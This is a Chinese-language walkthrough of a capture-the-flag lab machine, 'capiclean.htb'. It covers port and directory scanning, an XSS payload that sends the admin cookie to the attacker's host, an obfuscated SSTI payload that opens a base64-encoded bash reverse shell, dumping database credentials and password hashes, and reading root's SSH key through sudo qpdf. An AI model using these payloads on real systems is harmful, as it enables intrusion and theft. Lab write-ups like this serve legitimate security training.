基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV 10.10.11.12
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-07 13:55 CST
Nmap scan report for 10.10.11.12
Host is up (0.34s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 2c:f9:07:77:e3:f1:3a:36:db:f2:3b:94:e3:b7:cf:b2 (ECDSA)
|_  256 4a:91:9f:f2:74:c0:41:81:52:4d:f1:ff:2d:01:78:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.62 seconds

80

需要加hosts,家政服务相关的:

1
10.10.11.12 capiclean.htb

目录扫描

目录扫描可以发现dashboard跳转到首页:

1
2
3
4
5
6
7
8
9
10
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://capiclean.htb/

/about                (Status: 200) [Size: 5267]
/dashboard            (Status: 302) [Size: 189] [--> /]
/login                (Status: 200) [Size: 2106]
/logout               (Status: 302) [Size: 189] [--> /]
/quote                (Status: 200) [Size: 2237]
/server-status        (Status: 403) [Size: 278]
/services             (Status: 200) [Size: 8592]
/team                 (Status: 200) [Size: 8109]

capiclean

没开注册功能,能交互输入的地方就预约服务那里:

xss

基础xss,service那里,注意编码:

1
2
3
4
5
<img src=1 onerror=document.location="http://10.10.16.13:7777/"+btoa(document.cookie)>

GET /c2Vzc2lvbj1leUp5YjJ4bElqb2lNakV5TXpKbU1qazNZVFUzWVRWaE56UXpPRGswWVRCbE5HRTRNREZtWXpNaWZRLlpoSGx0US5wa3pnYmFLSlZyeHNyRllaOFNWWjM0UmxWeDA= HTTP/1.1" 404 -

session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhHltQ.pkzgbaKJVrxsrFYZ8SVZ34RlVx0

dashboard

添加cookie再访问dashboard,可以看到一些管理员功能:

Admin dashboard

InvoiceGenerator

admin几个功能正常测试,第一个生成invoice的,随意填写信息获得一个Invoice ID:

QRGenerator

然后使用这个Invoice ID去第二个功能生成二维码,获得一个对应二维码图片,并且多出一个新功能是输入链接生成Scannable Invoice:

使用得到的二维码链接正常测试,得到一张带二维码的发票:

SSTI

测试修改link,发现响应直接输出了我们的输入:

根据响应头的Server: Werkzeug/2.3.7 Python/3.10.12,基础SSTI:

shell

然后就是ssti执行命令获取shell,需要简单的绕过

1
2
3
4
5
6
7
{{request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("id")["read"]()}}

bash -i >& /dev/tcp/10.10.16.13/4444 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xMy80NDQ0IDA+JjE=
YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNi4xMy80NDQ0IDA%2BJjE%3D

{{request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNi4xMy80NDQ0IDA%2BJjE%3D | base64 -d | bash")["read"]()}}

信息

然后查看代码,app.py中得到数据库信息:

1
2
3
4
5
6
db_config = {
    'host': '127.0.0.1',
    'user': 'iclean',
    'password': 'pxCsmnGLckUb',
    'database': 'capiclean'
}

连接查看数据库,users中获取hash:

1
2
3
4
5
6
7
8
9
mysql -h 127.0.0.1 -u iclean -ppxCsmnGLckUb

mysql> use capiclean;
mysql> show tables;
mysql> desc users;
mysql> select * from users;

admin 2ae316f10d49222f369139ce899e414e57ed9e339bb75457446f2ba8628a6e51
consuela 0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa

consuela

consuela也是系统上用户,hash可以破解出密码:

1
2
3
0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa

simple and clean

user flag

使用得到的密码登录consuela:

提权信息

consuela可以sudo运行qpdf:

尝试直接使用infile读取文件报错缺失pdf header,但输入支持empty file,并且根据文档可以添加附件:

另外还有qdf选项创建适合在文本编辑器中查看的pdf

提权 & root flag

所以就是结合使用这些参数,将文件作为附件添加到pdf中,然后查看pdf获取对应文件内容:

1
2
3
sudo /usr/bin/qpdf --empty /tmp/miao/miao.pdf --qdf --add-attachment /root/.ssh/id_rsa --

cat miao.pdf

root flag

然后使用得到的私钥登录:

shadow

1
2
root:$y$j9T$s0AIwd7onN6K77K5v8DNN/$bSd333U5BKvkfCPEGdf9dLl3bOYwqOlFNtGZ1FQQuv/:19774:0:99999:7:::
consuela:$y$j9T$kcli/RCzquedZVyk0783m/$8KhTzkFppH2THx1k0SuUcjSP4jFXNl6HokF4MKwFr60:19605:0:99999:7:::

参考资料